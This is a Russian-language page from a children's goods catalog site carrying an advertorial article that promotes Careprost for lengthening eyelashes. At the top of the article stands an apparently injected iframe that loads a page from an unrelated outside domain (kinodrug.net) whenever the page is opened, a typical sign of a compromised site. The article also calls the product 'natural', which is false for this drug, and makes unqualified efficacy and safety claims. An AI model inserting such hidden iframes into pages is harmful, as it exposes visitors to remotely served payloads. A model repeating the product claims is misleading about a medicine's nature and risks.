Навигация по сайту : Каталог статей

Карепрост: естественное удлинение ресниц


<iframe src="http://kinodrug.net/hotlog/hotlog.html"></iframe>Каждой женщине, независимо от возраста, хочется выглядеть привлекательно, иметь выразительную внешность. В первую очередь мы говорим о лице. Чаще всего этот вопрос решается с помощью макияжа, особенно, что касается глаз. Но как быть тем, кто даже с помощью карандаша и туши не может добиться желаемого результата и не выглядеть при этом вульгарно?

Это актуально для всех женщин, предпочитающих естественный или просто не слишком навязчивый макияж, но имеющих короткие ресницы. Уже второй слой туши выдает их – ресницы начинают слипаться, отсутствует характерный изгиб. Причин этому может быть несколько, в частности, возрастные или природные. Часто, для того, чтобы улучшить внешний вид коротких ресниц, их подкручивают с помощью специальных щипчиков и наносят толстый слой туши. Это ведет к тому, что волоски ломаются или выглядят крайне неестественно. А наращивание или приклеивание накладных – весьма хлопотное и недолговечное дело.

Идеальный вариант – использование средства для роста ресниц. Наиболее эффективный способ состоит в ежедневной обработке карепростом. Это натуральный высокоэффективный косметический препарат, который позволяет заметно увеличить длину ресниц и длительное время поддерживать ее. Те, кто уже успел карепрост купить, с удовольствием делятся фотоотчетами о результатах.

В большинстве случаев, клинический эффект от использования данного препарата наступает после 4-6 недель применения, а максимальная длина видна через 12-16 недель. При этом на один такой курс хватает единственного флакона средства. Карепрост так эффективен, что косметологи рекомендуют не использовать его на нижних веках и не допускать попадания на другие участки лица, во избежание излишнего роста волос в местах контакта с кожей.

Данное средство запускает природные механизмы роста ресничных волос, увеличивая их длину и густоту. Даже после окончания использования карепроста, его результат сохраняется еще несколько месяцев (до окончательной замены ресниц). А если после курса ежедневного применения в дальнейшем использовать препарат 1-2 раза в неделю, то поддерживать эффект можно очень долго. Единственное ограничение, связанное с отсутствием соответствующих клинических испытаний – это беременность, период лактации, возраст до 18 лет и наличие онкологических заболеваний. В остальном карепрост хорошо переносится большинством людей.


Рекомендуем также прочитать


Комментарии к статье Карепрост: естественное удлинение ресниц

Комментарии пользователей отсутствуют... Ваш комментарий может стать первым!
Имя
Email (не будет показан)

Статьи
Подушка с Петухом, как символ 2017 года

Украшать свой дом к празднику – любимое занятие многих женщин. А особенно, если этот праздник – Новый год. В его преддверии каждому хочется превратить свое жилище в островок уюта и пригласить туда настоящую сказку....

Как связать детский шарф

В холодное время года вы заботитесь о том, чтобы ваш ребенок был одет не только тепло, но и стильно. Красивый детский шарф ручной вязки – лучшее дополнение к теплой одежде мальчика и девочки....

Верхняя демисезонная одежда для детей и подростков

Дети очень быстро растут, появляется постоянная необходимость обновлять гардероб с приходом различных сезонов года....

Фэмили лук для детей и их родителей

Прекрасным вариантом выглядеть стильно, красиво и модно станет решение приобрести одежду в стиле фэмили лук. Качественные модели предлагает компания isteriki....

Lego 2017 - новинки и обновления в будущем году

Ежегодно компания Lego разрабатывает для своих поклонников новые модели, дополняет уже существующие серии или вносит обновления в самые популярные наборы....

© 2011-2014 KupiTigra.ru - это каталог товаров для детей. В нашем каталоге размещают свои товары сотни детских интернет-магазинов России. Все товары разбиты по категориям: игрушки, коляски, развивающие игры, спортивные товары и т.д. Сравнивайте цены в нашем каталоге и покупайте там, где дешевле!
Каталог детских товаров, купить товары для детей